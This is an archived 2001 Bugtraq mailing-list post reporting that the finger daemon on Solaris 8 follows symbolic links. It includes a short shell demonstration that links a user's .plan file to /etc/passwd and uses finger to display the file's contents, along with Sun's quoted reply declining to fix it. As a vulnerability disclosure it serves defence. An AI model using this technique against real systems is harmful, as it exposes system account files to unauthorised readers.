[20754] in bugtraq


in.fingerd follows sym-links on Solaris 8

daemon@ATHENA.MIT.EDU (Lukasz Luzar)
Thu May 24 13:18:59 2001

Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)
From: Lukasz Luzar <lluzar@developers.of.pl>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0105241753470.11377-100000@unix.developers.of.pl>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

 Solaris 8 is still vulnerable to the old bug in the in.fingerd daemon.

 lluzar@sun:~ (101) > ln -s /etc/passwd .plan
 lluzar@sun:~ (102) > finger -l lluzar@sun.developers.of.pl
 [localhost]
 Login name: lluzar             In real life: Lukasz Luzar
 Directory: /home/lluzar        Shell: /bin/tcsh
 On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
 Mail last read Sat May 19 13:51:12 2001
 Plan:
 root:x:0:1:Super-User:/root:/sbin/sh
 daemon:x:1:1::/:
 bin:x:2:2::/usr/bin:
 sys:x:3:3::/:
 .
 .

 I believe it could be dangerous in some cases, but people from
 Sun say that they won't repair the in.fingerd because:

 "There may be legitimate reasons for finger to follow symlinks. If
 finger is considered a security issue, it can be disabled. (..)"

 What do you think ?

Cheers,

--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes